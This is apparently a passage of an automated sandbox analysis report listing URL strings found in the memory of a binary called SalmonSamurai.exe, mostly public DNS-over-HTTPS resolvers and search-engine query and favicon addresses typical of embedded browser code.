Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://developers.google.com/speed/public-dns/privacyGoogle
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dk.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dl.gmx.com/apps/favicon.icohttps://search.gmx.com/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.google/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.quad9.net/dns-querydns.quad9.netdns9.quad9.net9.9.9.9149.112.112.1122620:fe::fe2620:fe::
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns.sb/privacy/DNS.SBhttps://doh.dns.sb/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns10.quad9.net/dns-querydns10.quad9.net9.9.9.10149.112.112.102620:fe::102620:fe::fe:10;
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns11.quad9.net/dns-querydns11.quad9.net9.9.9.11149.112.112.112620:fe::112620:fe::fe:11
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/adult-filter
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/family-filter
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cleanbrowsing.org/doh/security-filter
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.cox.net/dns-querydot.cox.net68.105.28.1168.105.28.122001:578:3f::30Z
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.familyshield.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FE7FD000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabh
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://es.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/cdn/common/img/favicon.icohttps://search.goo.ne.jp/web.jsp?MT=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/sgt.jsp?MT=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.goo.ne.jp/web.jsp?MT=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.naver.com/search.naver?ie=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.privacywall.org/suggest.php?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.cz/favicon.icohttps://search.seznam.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.seznam.sk/favicon.icohttps://search.seznam.sk/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/favicon.icohttps://search.yahoo.co.jp/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.co.jp/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?p=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://searchatlas.centrum.cz/favicon.icohttps://searchatlas.centrum.cz/?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/favicon.icohttps://sg.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/search
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sg.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FECB5000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://source.chromium.org/chromium/chromium/src/
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://sp.ask.com/sh/i/a16/favicon/favicon.icohttps://www.ask.com/web?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.icohttps://search.naver.com/search.nav
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable-xxhdpi/yandex.png
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.at/web/result?q=
Source: SalmonSamurai.exe, 00000004.00000000.1993787751.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000011.00000000.2051327669.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000012.00000000.2070806191.00007FF6FED27000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://suche.gmx.net/web/result?q=
